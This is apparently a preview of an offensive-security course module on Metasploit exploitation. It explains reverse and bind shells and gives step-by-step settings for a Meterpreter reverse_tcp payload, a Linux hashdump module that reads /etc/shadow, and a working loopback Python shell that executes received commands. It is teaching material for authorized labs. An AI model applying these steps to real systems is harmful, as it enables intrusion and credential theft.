FILE: MOD3_Exploitation.md
MODULE 3: EXPLOITATION & POST-EXPLOITATION
⚠️ ETHICAL USE DISCLAIMER
This module teaches offensive security techniques for AUTHORIZED ENVIRONMENTS ONLY.
- All exploits demonstrated are against VMs you own
- Never use these techniques on systems without explicit written permission
- Unauthorized computer access is illegal (Computer Fraud and Abuse Act, 18 U.S.C. § 1030)
- Purpose: Learn offensive techniques to better defend systems
Learning Objectives
By completing this module, you will:
- Match discovered services to known CVEs (Common Vulnerabilities and Exposures)
- Configure and execute exploits using Metasploit Framework
- Understand the difference between bind and reverse shells
- Perform post-exploitation enumeration and privilege escalation
- Maintain persistent access to compromised systems (lab environment only)
- Document exploitation chains for penetration testing reports
Key Concepts
Vulnerability Assessment
CVE (Common Vulnerabilities and Exposures): Standardized identifiers for publicly known security vulnerabilities.
- Example: CVE-2011-2523 (vsftpd 2.3.4 backdoor)
- Database: https://cve.mitre.org or https://nvd.nist.gov
The Metasploit Framework
Architecture:
- Exploits: Code that takes advantage of vulnerabilities
- Payloads: Code executed after successful exploit (shells, backdoors)
- Auxiliary: Scanner and fuzzer modules (non-exploit)
- Post: Post-exploitation modules (privilege escalation, credential harvesting)
Shells Explained
Reverse Shell (Attacker Listens):
```
    Attacker                              Target
       |                                     |
       | (Listening on LHOST:4444)           |
       |<------ Connect to Attacker ---------| (Target initiates the connection)
       |-------- Shell Access -------------->|
```
Why it is preferred: the target opens an outbound connection to the attacker, so firewall rules or NAT that drop unsolicited inbound connections to the target do not stop it. Contrast this with a bind shell, where the target listens on a port and the attacker connects in; that model fails as soon as inbound traffic to the target is filtered. A reverse shell still needs an egress path, so choose an LPORT the target is likely allowed to reach (443 is a common choice when 4444 is blocked).
Professor's Guide
Once you select an exploit (use exploit/...), you must configure RHOSTS (the target IP) and LHOST (your Kali IP as seen from the target; check with ip addr and pick the interface on the lab network, not 127.0.0.1). The payload is crucial. Set it to a reverse shell (set payload linux/x86/meterpreter/reverse_tcp); it calls back to LHOST on LPORT, which defaults to 4444, so that port must be free on Kali and reachable from the target. Confirm everything with show options before running. When you type exploit, Kali sends the malicious traffic and, if it succeeds, the target connects back to you, which bypasses inbound firewall rules on the target side.
Once you have the Meterpreter session, practice commands such as sysinfo, getuid, and shell to interact with the compromised operating system. Note that hashdump is a command of the Windows Meterpreter; against a Linux target run the post/linux/gather/hashdump module instead (run post/linux/gather/hashdump), which needs root on the target because it reads /etc/shadow.
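The call-back described above, together with the reverse-versus-bind distinction from Shells Explained, as an added example that is not part of this module or of Metasploit: both "attacker" and "target" run as threads on 127.0.0.1 so it can be run offline on a lab machine, the listener stands in for multi/handler on LHOST:LPORT, and the ports are picked by the OS. It assumes a POSIX sh is available for the echo commands it runs.

```python
"""Reverse vs bind shell over loopback: which side listens, which side connects.

Added example, not code from the module. Both roles run as threads on
127.0.0.1 so it works offline. The target side executes whatever command
line it receives, exactly as a real shell payload does, so run it only on
a lab machine you own.
"""
import socket
import subprocess
import threading

HOST = "127.0.0.1"  # loopback only: a lab demonstration, not a deployable payload


def _serve_one_command(conn: socket.socket) -> None:
    """Target side of either shell: read one command line, run it, send output back."""
    with conn:
        cmd = conn.recv(4096).decode().strip()
        # Assumes a POSIX sh; same behaviour as a payload handing input to /bin/sh.
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True)
        conn.sendall((result.stdout + result.stderr).encode())


def _drive_one_command(conn: socket.socket, cmd: str) -> str:
    """Attacker side of either shell: send one command, collect the reply until EOF."""
    with conn:
        conn.sendall((cmd + "\n").encode())
        chunks = []
        while True:
            data = conn.recv(4096)
            if not data:
                break
            chunks.append(data)
    return b"".join(chunks).decode()


def reverse_shell(cmd: str) -> str:
    """Attacker LISTENS (like multi/handler on LHOST:LPORT); target CONNECTS out.

    Only an outbound connection leaves the target, which is why this model
    survives firewalls that drop unsolicited inbound connections.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((HOST, 0))            # port 0: let the OS choose a free LPORT
    listener.listen(1)
    lport = listener.getsockname()[1]

    def target():                       # what the payload does after a successful exploit
        s = socket.create_connection((HOST, lport))
        _serve_one_command(s)

    t = threading.Thread(target=target)
    t.start()
    conn, _ = listener.accept()         # session opened by the target's call-back
    listener.close()
    out = _drive_one_command(conn, cmd)
    t.join()
    return out


def bind_shell(cmd: str) -> str:
    """Target LISTENS on a port; attacker CONNECTS in.

    Needs an inbound path to the target, so inbound filtering or NAT in
    front of the target defeats this model.
    """
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    listener.bind((HOST, 0))
    listener.listen(1)
    rport = listener.getsockname()[1]

    def target():
        conn, _ = listener.accept()
        listener.close()
        _serve_one_command(conn)

    t = threading.Thread(target=target)
    t.start()
    conn = socket.create_connection((HOST, rport))  # attacker dials in
    out = _drive_one_command(conn, cmd)
    t.join()
    return out


if __name__ == "__main__":
    print("reverse:", reverse_shell("echo reverse-ok").strip())
    print("bind:   ", bind_shell("echo bind-ok").strip())
```

Both functions exchange a single command so the roles stay readable; the only difference between them is which side calls listen() and which calls connect(), and that difference is the whole reason a reverse payload is the default choice behind a filtering firewall.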
CONTINUED IN FULL VERSION - See MOD3_Exploitation_FULL.md for complete detailed labs
END OF MODULE 3 PREVIEW